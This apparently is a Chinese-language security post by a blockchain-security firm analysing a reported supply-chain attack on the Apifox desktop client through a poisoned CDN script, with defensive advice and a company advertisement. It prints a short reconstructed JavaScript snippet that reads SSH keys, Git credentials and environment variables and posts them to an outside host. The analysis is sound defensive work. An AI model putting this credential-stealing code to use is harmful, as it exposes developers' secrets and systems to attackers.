🚨 隐形后门：Apifox 供应链攻击深度拆解(含恶意代码还原)

近期一起典型供应链攻击曝光：攻击者篡改 CDN 托管 JS 文件，在客户端启动时自动执行恶意逻辑，实现数据窃取与远程控制 (Binance)

🔍 攻击链路解析

Apifox 桌面端基于 Electron，启动时加载远程脚本，一旦 CDN 被污染，攻击代码即进入执行链 (oschina.net)

(function(){

const data = {

ssh: read("~/.ssh"),

git: read("~/.git-credentials"),

env: process.env

};

fetch("https://apifox.it.com", {

method:"POST",

body: JSON.stringify(data)

});

})();

该代码通过 Node API 直接读取本地敏感文件并外传，绕过浏览器沙箱限制 (LINUX DO)

⚡ 关键恶意行为

🔹 窃取 SSH / Git 凭证

🔹 收集系统信息(用户名、MAC)

🔹 拉取二阶段 payload 实现 RCE

🔹 加密通信规避检测 (搜狐网)

🧠 为何难以发现

恶意 JS 经过高度混淆，仅在特定条件触发，结合动态加载与运行时执行，传统静态分析几乎失效 (docs.apifox.com)

🛡️ 安全启示(专业视角)

• 禁用远程动态脚本加载

• Electron 必须启用 sandbox

• 引入运行时行为检测(EDR)

• 对第三方依赖进行完整性校验

📌 本质上，这类攻击利用“信任链断裂”，一旦入口被污染，整个开发环境即被接管，是当前最隐蔽且破坏力极强的攻击方式之一

ChainSafeAI(链熵科技)专注于区块链生态安全，以“数据驱动 + 技术赋能”构建360°全方位安全防护体系，服务于交易所、金融机构、OTC服务商及加密资产投资者。

公司提供覆盖KYT风险监测、智能合约审计、加密资产追踪、区块链漏洞测试等在内的全维度安全与合规技术解决方案，助力客户防范洗钱、诈骗等风险，保障业务合规运行。

通过实时风险预警、合规审查与资金溯源分析，协助客户识别链上异常行为、防范洗钱及诈骗风险、降低被盗损失并提升资产追回可能性。